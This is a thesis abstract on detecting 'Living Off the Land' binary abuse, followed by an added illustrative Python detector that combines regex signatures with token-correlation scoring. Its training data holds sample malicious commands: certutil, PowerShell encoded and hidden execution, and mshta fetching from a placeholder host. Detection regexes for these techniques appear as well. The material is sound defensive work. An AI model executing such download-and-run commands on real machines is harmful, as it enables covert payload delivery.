Publication Date

Fall 2023

Degree Type

Thesis

Degree Name

Master of Science (MS)

Department

Computer Engineering

Advisor

Younghee Park; Bernardo Flores; Jun Liu

Abstract

The cybersecurity environment is constantly evolving as attackers deploy progressively advanced methodologies. The utilization of Living Off the Land Binaries (LOLBins) represents a notable strategy in which normal system utilities are exploited for the purpose of executing malicious actions. This approach poses difficulties in terms of both detection and mitigation. The primary objective of this study is to examine LOLBins, which are a specific category of tactics falling under the broader concept of "Living Off the Land" (LOL). In LOLBins, malicious actors exploit pre-existing tools in order to maintain a covert presence and circumvent security measures. Defending against LOLBins is essential in modern cybersecurity, and strategies to detect and mitigate them have been developed. This work proposes a novel approach for identifying suspicious commands leading to malicious activities by treating user commands as token sets. We combined the use of regular expressions with correlation-based methods to classify user commands as malicious or benign. Using trained datasets for both malicious and benign commands, our model improves detection rates while minimizing false positives. The proposed detection framework is intended to be flexible, adaptable, and scalable across different operating systems and environments. By implementing dynamic dataset management, our system can readily incorporate new command patterns and adapt to emerging LOLBin attack variants. This feature facilitates the ease of training the model to detect new commands and tactics as they evolve in the threat landscape. Real-world scenarios validate our methodology, emphasizing the importance of command-line auditing in countering the threats posed by LOLBins.
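The abstract describes the detection pipeline only at a high level: commands are reduced to token sets, regular-expression signatures are combined with a correlation-based classifier trained on labelled benign and malicious commands, and the labelled dataset can be extended at run time. The following is an added illustration of that pipeline, written for this page; it is not the thesis's code, and the tokenizer rules, the signature regexes, the choice of the phi coefficient as the "correlation" measure, the training commands (constructed, with `example.invalid` as the placeholder host) and the threshold of 1.0 are all assumptions made here.

```python
import math
import re
from collections import Counter

# Constructed training data (not from the thesis): Windows-style process
# command lines labelled benign or malicious. Hosts use the reserved
# "example.invalid" name and the base64 blob is an arbitrary placeholder.
BENIGN_TRAINING = [
    r'C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt',
    r'C:\Windows\System32\cmd.exe /c dir C:\Users\alice\Documents',
    r'C:\Windows\System32\certutil.exe -hashfile C:\installers\setup.msi SHA256',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\scripts\backup.ps1',
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL',
]
MALICIOUS_TRAINING = [
    r'C:\Windows\System32\certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Users\Public\a.exe',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUFFS',
    r'C:\Windows\System32\mshta.exe http://example.invalid/x.hta',
]

# --- Stage 0: reduce a command line to a set of normalised tokens -----------
# Paths collapse to their last component and volatile arguments (URLs, IPs,
# long base64 blobs) become placeholders, so variants of one technique share
# most of their tokens. (Assumed rules, not the thesis's tokenizer.)
_TOKEN = re.compile(r'"[^"]*"|\S+')
_URL = re.compile(r'^https?://', re.I)
_IP = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')
_B64 = re.compile(r'^[A-Za-z0-9+/]{20,}={0,2}$')

def tokenize(cmd: str) -> set[str]:
    tokens = set()
    for raw in _TOKEN.findall(cmd):
        tok = raw.strip('"').lower()
        if '\\' in tok:                       # C:\Windows\System32\x.exe -> x.exe
            tok = tok.rsplit('\\', 1)[-1]
        if not tok:
            continue
        if _URL.match(tok):
            tok = '<url>'
        elif _IP.match(tok):
            tok = '<ip>'
        elif _B64.match(tok):
            tok = '<b64>'
        tokens.add(tok)
    return tokens

# --- Stage 1: high-confidence regular-expression signatures -----------------
# Constructed for this example; a deployment would curate its own rule set.
SIGNATURE_RULES = {
    'certutil_remote_fetch': re.compile(r'\bcertutil(?:\.exe)?\b.*\s-urlcache\b', re.I),
    'powershell_encoded_command': re.compile(r'\bpowershell(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand)\b', re.I),
    'mshta_remote_script': re.compile(r'\bmshta(?:\.exe)?\b.*\shttps?://', re.I),
}

# --- Stage 2: correlation between token presence and the malicious label ----
class TokenCorrelationModel:
    """Per-token phi coefficient: Pearson correlation of the two binary
    variables 'token present in command' and 'command is malicious'."""

    def __init__(self) -> None:
        self.present = {'malicious': Counter(), 'benign': Counter()}
        self.n_docs = {'malicious': 0, 'benign': 0}

    def add_example(self, cmd: str, label: str) -> None:
        """Dynamic dataset management: a new labelled command takes effect at once."""
        self.n_docs[label] += 1
        self.present[label].update(tokenize(cmd))   # presence per command, not frequency

    def phi(self, token: str) -> float:
        a = self.present['malicious'][token]         # malicious, token present
        b = self.present['benign'][token]            # benign, token present
        c = self.n_docs['malicious'] - a             # malicious, token absent
        d = self.n_docs['benign'] - b                # benign, token absent
        denom = (a + b) * (c + d) * (a + c) * (b + d)
        if denom == 0:                               # unseen or universal token: no evidence
            return 0.0
        return (a * d - b * c) / math.sqrt(denom)

    def score(self, cmd: str) -> float:
        return sum(self.phi(t) for t in tokenize(cmd))

def build_model() -> TokenCorrelationModel:
    model = TokenCorrelationModel()
    for cmd in BENIGN_TRAINING:
        model.add_example(cmd, 'benign')
    for cmd in MALICIOUS_TRAINING:
        model.add_example(cmd, 'malicious')
    return model

def classify(cmd: str, model: TokenCorrelationModel, threshold: float = 1.0) -> dict:
    """A command is flagged if any signature fires OR the summed token
    correlation exceeds the threshold (assumed value 1.0)."""
    hits = [name for name, rx in SIGNATURE_RULES.items() if rx.search(cmd)]
    score = model.score(cmd)
    verdict = 'malicious' if hits or score > threshold else 'benign'
    return {'verdict': verdict, 'rules': hits, 'score': round(score, 3)}

if __name__ == '__main__':
    m = build_model()
    # A variant with no signature match is still caught by the token correlation.
    print(classify(r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -File C:\temp\x.ps1', m))
    # A legitimate use of the same binary scores negative.
    print(classify(r'C:\Windows\System32\certutil.exe -hashfile C:\Users\alice\download.iso SHA256', m))
```

The two stages cover each other's blind spots: the signatures give precise hits for known patterns, while the token-set correlation scores a new variant from the tokens it shares with the training data, and a previously unseen tool contributes nothing until a labelled example of it is added with `add_example`, at which point every later classification uses the updated counts without retraining.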
